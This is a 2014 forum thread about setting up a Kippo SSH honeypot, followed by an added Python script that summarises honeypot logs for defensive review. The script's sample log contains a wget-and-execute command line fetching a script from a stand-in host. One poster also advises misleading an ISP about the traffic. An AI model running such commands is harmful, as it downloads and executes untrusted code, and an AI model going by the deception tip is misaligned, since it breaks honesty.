GuardMoony Posted August 1, 2014

Do any of you guys have any experience with kippo? I'm looking to set up my first honeypot. You know, just to see and test out. And I'm wondering if any of you have some tips/tricks you might want to share.

Kind regards,
GuardMoony
cooper Posted August 1, 2014

I don't know the software. General advice when setting up a honeypot:

1. Assume the honeypot has been completely compromised from day 1. Monitor the machine by looking at the traffic ONLY.
2. Try to run the install off of read-only media (CD/DVD/write-protected SD/...) so a quick reset will revert any changes anybody may have made.
3. DO NOT set this up on your home network directly accessible via your ISP - they might notice the suspect traffic, assume you've been hacked and shut you off (yup, experience talking here. If it happens to you, call them up and say you've found and completely reinstalled the hacked machine. Blame a family member who's since had a stern talking to. DO NOT say you're running a honeypot as they'll probably tell you that's against their TOS and it'll take longer for you to get back online).
4. Never, EVER connect to this machine via the network. If you must log on, do so using direct access. Absolutely NOTHING on this machine can refer to anything else you have access to, as it'll likely become the next target once the honeypot has been taken.
5. If this machine resides on your network, FIREWALL THE LIVING FUCK out of the connection between it and the rest of the network. See #1. Try to airgap the thing.

And of course:

6. Report back what you find. It should be pretty interesting.
GuardMoony (Author) Posted August 1, 2014

First off, I won't be running it on my private internet connection. It will be placed in a datacenter behind a firewall. Only port 22 will be configured as a forward (SSH honeypot); outgoing, only the minimum will be allowed. Access to the VPS running it will happen over a VPN towards the VPS server and then by console (as close to direct as possible). I might allow trusted community members access to the data. There are some scripts to let it autosend the data/logs by mail.

Edited August 1, 2014 by GuardMoony
cooper Posted August 4, 2014

What are the services you will activate on the server for any attacker to exploit?
GuardMoony (Author) Posted August 5, 2014

As written above: kippo is only an SSH honeypot, so only the SSH service will be there. It also simulates a basic shell and allows wget/ftp to work, hence capturing malware/exploits.
cooper Posted August 5, 2014

Read a bit more about Kippo. It looks pretty nice and it's an interesting concept. I'd be quite interested to know what it turns up.
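Cooper's advice to judge the box only from what it records, and the thread's point that Kippo captures the credentials tried, the commands typed into its fake shell and whatever the intruder fetches with wget/ftp, comes down to reading kippo.log. The following is an added example, not code from the thread or from the Kippo project: a small offline summariser that turns a Kippo-style log into the kind of report one would mail out nightly. The sample lines are constructed and modelled on Kippo's text log layout; the exact field order is an assumption, so adjust the regexes to match a real kippo.log. All IP addresses are documentation ranges, not real sources.

```python
import re
from collections import Counter

# Constructed sample lines, modelled on Kippo's kippo.log layout (an assumption:
# a real log may differ slightly; adjust the regexes below to match it).
SAMPLE_LOG = """\
2014-08-01 10:23:45+0200 [SSHService ssh-userauth on HoneyPotTransport,0,192.0.2.10] login attempt [root/123456] failed
2014-08-01 10:23:47+0200 [SSHService ssh-userauth on HoneyPotTransport,0,192.0.2.10] login attempt [root/toor] succeeded
2014-08-01 10:23:50+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,192.0.2.10] CMD: wget http://198.51.100.7/x.sh
2014-08-01 10:23:51+0200 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,0,192.0.2.10] CMD: chmod +x x.sh; ./x.sh
2014-08-01 11:02:03+0200 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.23] login attempt [admin/admin] failed
2014-08-01 11:02:04+0200 [SSHService ssh-userauth on HoneyPotTransport,1,198.51.100.23] login attempt [admin/password] failed
"""

# Both event types carry a "HoneyPotTransport,<n>,<source ip>]" prefix,
# which is what ties a login or a command back to the connecting host.
LOGIN_RE = re.compile(
    r"HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] "
    r"login attempt \[(?P<user>[^/\]]*)/(?P<pw>[^\]]*)\] (?P<result>failed|succeeded)"
)
CMD_RE = re.compile(r"HoneyPotTransport,\d+,(?P<ip>[\d.]+)\] CMD: (?P<cmd>.*)$")
URL_RE = re.compile(r"(?:https?|ftp)://\S+")


def summarize(log_text):
    """Parse Kippo log text and return the counters a defender wants to see."""
    creds = Counter()      # "user/password" -> number of attempts
    sources = Counter()    # source IP -> number of login attempts
    successes = []         # (ip, user, password) for logins Kippo let through
    commands = []          # (ip, command) typed into the emulated shell
    urls = []              # anything the intruder tried to fetch (wget/ftp/curl)
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            creds[f"{m['user']}/{m['pw']}"] += 1
            sources[m["ip"]] += 1
            if m["result"] == "succeeded":
                successes.append((m["ip"], m["user"], m["pw"]))
            continue
        m = CMD_RE.search(line)
        if m:
            commands.append((m["ip"], m["cmd"]))
            urls.extend(URL_RE.findall(m["cmd"]))  # candidate malware samples
    return {
        "attempts": sum(creds.values()),
        "successes": successes,
        "top_creds": creds.most_common(5),
        "sources": sources,
        "commands": commands,
        "download_urls": sorted(set(urls)),
    }


def report(summary):
    """Plain-text report, the shape of thing a mail-out script would send."""
    lines = [f"login attempts: {summary['attempts']} from {len(summary['sources'])} source(s)"]
    for ip, n in summary["sources"].most_common():
        lines.append(f"  {ip}: {n} attempt(s)")
    lines.append(f"successful logins: {len(summary['successes'])}")
    for ip, user, pw in summary["successes"]:
        lines.append(f"  {ip} as {user}/{pw}")
    lines.append("most tried credentials:")
    for cred, n in summary["top_creds"]:
        lines.append(f"  {cred}: {n}")
    lines.append("commands run in the fake shell:")
    for ip, cmd in summary["commands"]:
        lines.append(f"  [{ip}] {cmd}")
    lines.append("URLs the intruder tried to fetch (treat as hostile, never run):")
    for url in summary["download_urls"]:
        lines.append(f"  {url}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(summarize(SAMPLE_LOG)))
```

Run it against a real log with `summarize(open("kippo.log").read())` on a separate analysis host, not on the honeypot itself, in line with cooper's point #4: the log is copied off the box, and the box is never trusted to do its own reporting.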